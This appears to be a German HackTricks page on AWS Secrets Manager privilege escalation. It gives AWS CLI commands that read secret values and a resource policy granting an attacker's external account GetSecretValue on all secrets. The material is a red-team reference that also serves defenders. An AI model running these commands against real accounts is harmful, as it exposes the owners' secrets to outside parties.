AWS - Secrets Manager Privesc

Tip

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lerne & übe Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstütze HackTricks

Secrets Manager

Für mehr Informationen über Secrets Manager siehe:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Ein attacker mit dieser Berechtigung kann den gespeicherten Wert in einem secret in AWS Secretsmanager abrufen.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potenzielle Auswirkung: Zugriff auf hochsensible Daten im AWS Secrets Manager.

Warning

Beachte, dass selbst mit der Berechtigung secretsmanager:BatchGetSecretValue ein Angreifer zusätzlich secretsmanager:GetSecretValue benötigt, um die sensiblen Secrets abzurufen.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Mit den vorherigen Berechtigungen ist es möglich, anderen Principals/Accounts (auch externen) Zugriff zu gewähren, um auf das secret zuzugreifen. Beachte, dass ein Benutzer, um verschlüsselte secrets zu lesen, die mit einem KMS key verschlüsselt sind, außerdem Zugriff auf den KMS key benötigt (mehr Infos auf der KMS Enum page).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

Tip

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Lerne & übe Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstütze HackTricks